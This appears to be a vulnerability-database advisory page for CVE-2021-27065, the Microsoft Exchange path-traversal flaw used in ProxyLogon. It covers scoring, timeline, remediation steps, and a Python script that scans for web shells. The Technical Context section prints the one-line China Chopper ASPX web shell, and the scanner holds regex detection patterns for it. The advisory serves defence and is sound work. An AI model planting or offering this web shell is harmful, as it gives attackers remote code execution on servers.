CVE-2021-27065

HIGH
2021-03-03 [email protected]
7.8
CVSS 3.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: Local
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Analysis Generated: Mar 26, 2026 - 11:19 (vuln.today)
Added to CISA KEV: Dec 18, 2025 - 02:00 (cisa), CISA KEV
PoC Detected: Dec 18, 2025 - 02:00 (vuln.today), public exploit code
Patch Released: Dec 18, 2025 - 02:00 (nvd), patch available
CVE Published: Mar 03, 2021 - 00:15 (nvd), HIGH 7.8

Description

Microsoft Exchange Server Remote Code Execution Vulnerability

Analysis

Microsoft Exchange Server allows a post-authentication arbitrary file write that enables web shell deployment, the primary persistence mechanism in the ProxyLogon attack chain, which is responsible for compromising 250,000+ servers.

Technical Context

The CWE-22 path traversal in Exchange's file handling allows writing arbitrary content to paths controlled by the attacker. The exploit writes a one-line ASPX web shell (typically the 'China Chopper' web shell: `<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe")%>`) to the OWA virtual directory.

Affected Products

Microsoft Exchange Server 2013/2016/2019

Remediation

Apply patches AND scan for web shells. Check C:\inetpub\wwwroot\aspnet_client\, OWA, and ECP directories for suspicious .aspx files. Run Microsoft's Exchange On-premises Mitigation Tool (EOMT). Review IIS logs for web shell access.
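
The web shell check described above can be scripted. The following is an added example, not code from Microsoft or EOMT: it walks the given directories for .aspx files and flags content resembling the one-line JScript shell quoted under Technical Context. The indicator names and regular expressions are assumptions of this example; only the aspnet_client path comes from this page, and OWA and ECP directories are supplied as arguments.

```python
import re
import sys
from pathlib import Path

# The only concrete path given in the remediation text. OWA and ECP directory
# locations depend on the install, so pass them as command-line arguments.
DEFAULT_ROOTS = [r"C:\inetpub\wwwroot\aspnet_client"]

# Heuristic indicators (assumptions of this example, not vendor signatures),
# modelled on the one-line JScript web shell quoted in Technical Context.
INDICATORS = {
    "jscript-page-directive": re.compile(
        r"<%@\s*Page\s+Language\s*=\s*[\"']?JScript", re.I),
    "eval-of-request-data": re.compile(r"\beval\s*\(\s*Request\b", re.I),
}


def decode(raw):
    """Decode file bytes, honouring a UTF-16 BOM so wide-character files are not missed."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def scan_roots(roots):
    """Return {path: [indicator names]} for every .aspx file under roots that matches."""
    findings = {}
    for root in map(Path, roots):
        if not root.is_dir():
            continue  # directory absent on this host
        for path in root.rglob("*"):
            if not path.is_file() or path.suffix.lower() != ".aspx":
                continue
            try:
                text = decode(path.read_bytes())
            except OSError:
                findings[str(path)] = ["unreadable"]  # locked or ACL-denied: check by hand
                continue
            hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for file_path, hits in sorted(scan_roots(sys.argv[1:] or DEFAULT_ROOTS).items()):
        print(f"{file_path}\t{','.join(hits)}")
```

An empty result does not clear a server: these two patterns only catch shells shaped like the quoted one-liner, so any .aspx file that does not belong in these directories still needs review alongside the IIS logs.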

Priority Score

213
KEV: +50
EPSS: +94.3
CVSS: +39
POC: +20
